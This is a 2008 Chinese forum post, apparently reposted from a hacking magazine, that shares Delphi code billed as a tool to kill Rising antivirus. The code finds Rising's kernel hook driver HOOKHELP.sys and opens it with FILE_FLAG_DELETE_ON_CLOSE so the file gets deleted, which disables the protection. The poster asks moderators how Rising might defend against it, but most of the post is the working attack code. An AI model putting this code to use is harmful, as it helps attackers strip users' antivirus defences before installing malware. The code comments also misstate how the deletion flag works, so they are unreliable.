发表于: 2008-08-08 17:56 | 显示全部 短消息 资料
字号: 1楼

干掉瑞星的工具

据说可以kill RISING


版主给看看  瑞星是否能够如何防范


关键代码:
function Deleterising:boolean;
var
Wdir : pChar;
Stmp,RisHookPath:string;
Hfile:THandle;
begin
result:=false;
Getmem(wdir,255);
GetSystemDirectory(Wdir, 255); //得到系统System32的目录
Stmp:=pchar(wdir);
if (Stmp[length(Stmp)]<>'\') then Stmp:=Stmp+'\';
RisHookPath:=Stmp+'drivers\HOOKHELP.sys';//得到瑞星的底层HOOK驱动文件的路径
//showmessage(RisHookPath);
Try
Hfile:=CreateFile(PCHAR(RisHookPath),GENERIC_READ,FILE_SHARE_READ,nil,OPEN_EXISTING,FILE_FLAG_DELETE_ON_CLOSE,0);//其中FILE_FLAG_DELETE_ON_CLOSE参数的含义是系统重启后删除文件
closehandle(hfile);
result:=true;
except
end;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
if Deleterising then
begin
showmessage('删除文件成功,请重启系统!');
end;
end;
end.
【转自黑防】





用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; TheWorld)

附件附件:

您所在的用户组无法下载或查看附件

一见钟情,再而衰,三而竭。